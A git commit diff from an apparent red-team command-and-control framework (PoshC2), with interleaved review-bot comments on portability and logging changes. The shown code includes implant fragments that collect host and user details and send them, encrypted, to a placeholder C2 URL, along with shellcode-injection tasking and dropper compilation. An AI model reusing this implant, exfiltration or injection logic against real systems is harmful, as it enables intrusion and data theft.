Use pyreadline for Windows compatibility and when injecting shellcode log filename

temp
m0rv4i 2019-04-24 18:18:30 +01:00
parent ae3c5ed3cf
commit 0aaa5ce53c
11 changed files with 36 additions and 31 deletions


@ -1,4 +1,5 @@
#!/usr/bin/env python
import os
from UrlConfig import UrlConfig
HOST_NAME = '0.0.0.0'
@ -56,12 +57,12 @@ ServerHeader = "Apache"
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
# DO NOT CHANGE #
FilesDirectory = "%sFiles/" % POSHDIR
PayloadsDirectory = "%spayloads/" % ROOTDIR
ModulesDirectory = "%sModules/" % POSHDIR
DownloadsDirectory = "%sdownloads/" % ROOTDIR
ReportsDirectory = "%sreports/" % ROOTDIR
Database = "%s/PowershellC2.SQLite" % ROOTDIR
FilesDirectory = "%sFiles%s" % (POSHDIR, os.sep)
PayloadsDirectory = "%spayloads%s" % (ROOTDIR, os.sep)
ModulesDirectory = "%sModules%s" % (POSHDIR, os.sep)
DownloadsDirectory = "%sdownloads%s" % (ROOTDIR, os.sep)
ReportsDirectory = "%sreports%s" % (ROOTDIR, os.sep)
Database = "%s%sPowershellC2.SQLite" % (ROOTDIR, os.sep)
# DO NOT CHANGE #
# These rules aren't needed as you'll find them auto-generated within the project folder now.
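Review bot: The new path constants from `FilesDirectory` to `Database` are still built by string formatting with `os.sep`, which only yields valid paths if `ROOTDIR` and `POSHDIR` already end in a separator, and in that case `Database` gets a doubled one. The old lines imply the trailing separator, but both definitions are outside these hunks, so that is an assumption. `os.path.join` states the intent directly, e.g. `PayloadsDirectory = os.path.join(ROOTDIR, "payloads", "")` and `Database = os.path.join(ROOTDIR, "PowershellC2.SQLite")`. A short comment that the directory constants are expected to end with a separator would help anyone reading the block marked DO NOT CHANGE.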


@ -1,9 +1,9 @@
#!/usr/bin/python
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob, readline, pyreadline.rlmain
from Config import HTTPResponses, POSHDIR, PayloadsDirectory
from Utils import randomuri
from TabComplete import readline, tabCompleter
from TabComplete import tabCompleter
from Help import COMMANDS
def default_response():
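Review bot: `pyreadline.rlmain` is imported unconditionally on the new import line, although the commit title says it is there for Windows compatibility; on other platforms the import is at best unused and may fail at start-up if pyreadline finds no console implementation (not verifiable from this page). The same addition is made in the three other Python files whose import hunks follow on this page. Guard it, e.g. `if os.name == 'nt': import pyreadline.rlmain`, and add a comment saying what the import is needed for, since no visible line uses the name. `default_response` begins on the last line of the hunk and continues outside it.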


@ -77,7 +77,7 @@ public class Program
x.Headers.Add("Referrer", "#REPLACEREFERER#");
if (null != cookie)
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, String.Format("SessionID={0}", cookie));
return x;
}
@ -188,7 +188,7 @@ public class Program
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
var o = String.Format("{0};{1};{2};{3};{4};#REPLACEBASEURL#", dn, u, cn, arch, pid);
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
@ -331,7 +331,7 @@ public class Program
internal static String GenerateUrl()
{
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
return String.Format("{0}/{1}{2}/?{3}", _baseUrl, URL, Guid.NewGuid(), _randomURI);
}
}
@ -502,7 +502,7 @@ public class Program
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
}
output.AppendLine(strOutput.ToString());
@ -519,7 +519,7 @@ public class Program
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);


@ -1,6 +1,6 @@
#!/usr/bin/python
import sys, re, os, readline, time, subprocess, traceback, signal, argparse
import sys, re, os, time, subprocess, traceback, signal, argparse, readline, pyreadline.rlmain
from sqlite3 import Error
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails


@ -1,4 +1,4 @@
import base64, re, traceback, os, sys
import base64, re, traceback, os, sys, readline, pyreadline.rlmain
from Alias import ps_alias
from Colours import Colours
from Utils import randomuri, validate_sleep_time
@ -10,7 +10,7 @@ from Core import readfile_with_completion, filecomplete
from Opsec import ps_opsec
from Payloads import Payloads
from Utils import argp, load_file, gen_key
from TabComplete import readline, tabCompleter
from TabComplete import tabCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
try:
@ -406,7 +406,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
@ -471,13 +471,16 @@ def migrate(randomuri, user, params=""):
arch = "86"
if implant_comms == "Normal":
shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ")
shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch))
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)
shellcodefile = load_file(path)
elif implant_comms == "Proxy":
shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
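Review bot: The `#<basename>` suffix added to the `$Shellcode` tasks in `handle_ps_command` and `migrate` leaves the task log with only a file name, so two different files with the same name cannot be told apart afterwards. Since the encoded bytes are being dropped from the logged command, a digest would keep the record short and still let a later review tie the entry to the exact file, e.g. `hashlib.sha256(shellcodefile).hexdigest()` next to `os.path.basename(path)` (this needs `hashlib` imported). In `migrate` the three branches now each repeat `shellcodefile = load_file(path)`; assigning only `path` in the branches and loading once after them would be shorter. Both functions start and end outside the hunks shown.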


@ -190,7 +190,8 @@ class Payloads(object):
output_file.write(cs9)
output_file.close()
if os.name == 'nt':
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe %s%sdropper.cs -o %s%sdropper_cs.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
else:
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
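Review bot: Both new Windows command lines interpolate `self.BaseDirectory` and `name` into one unquoted string, so a base directory containing a space splits the `-out:` and source arguments, and if the string is later run through a shell (the call is outside this hunk) the values are interpreted by that shell. Building an argument list and passing it to `subprocess` without a shell avoids both problems. The compiler location is also fixed to `C:\Windows\Microsoft.NET\Framework\v4.0.30319`; deriving the prefix from the `windir` environment variable would cover non-default installs. `compile` shadows the Python builtin of the same name, which predates this change.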


@ -75,7 +75,7 @@ def handle_sharp_command(command, user, randomuri, startup):
try:
shellcodefile = load_file(path)
if shellcodefile != None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)


@ -1,6 +1,6 @@
#!/usr/bin/python
import os, sys, readline, glob
import os, sys, readline, pyreadline.rlmain, glob
class tabCompleter(object):
"""


@ -19,12 +19,9 @@ def newTask(path):
user_command = command
hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith("run-exe core.program core inject-shellcode")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith("$shellcode86")) or (command.lower().startswith("$shellcode86")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith('upload-file')):
filepath = command.replace('upload-file', '')
if ";" in filepath:
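Review bot: `command.index("#")` in the merged branch raises `ValueError` for any matching task that lacks the marker, and it splits at the first `#`, which for the `run-exe ... Inject-Shellcode` form may fall inside `params`, because the producer on this page places `params` before the ` #name` suffix. Whether a caller catches the exception is not visible in this hunk. `partition` copes with a missing marker: `head, sep, name = command.partition("#")` followed by `if sep: user_command, command = "Inject Shellcode: %s" % name, head`. The condition also evaluates `command.lower()` three times; `command.lower().startswith((...))` with a tuple of the three prefixes is equivalent.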


@ -14,6 +14,8 @@ Add a configurable jitter to all implants
Update the notifications config if it is changed in the Config.py
Add NotificationsProjectName in Config.py which is displayed in notifications message
Add fpc script which searches the Posh DB for a particular command
Use pyreadline for Windows compatibility
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
4.8 (13/02/19)
==============


@ -1,4 +1,5 @@
pyopenssl
pandas
pyttsx3
pycrypto
pycrypto
pyreadline
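Review bot: `pyreadline` is added unpinned and for every platform, although the changelog entry in this commit describes it as a Windows compatibility dependency. An environment marker keeps it off other hosts: `pyreadline; sys_platform == "win32"`; that in turn requires the `pyreadline.rlmain` imports in the Python files to be guarded by platform. Pinning a known-good release (for example `pyreadline==<version>`) makes installs reproducible; the other entries in this file are unpinned as well.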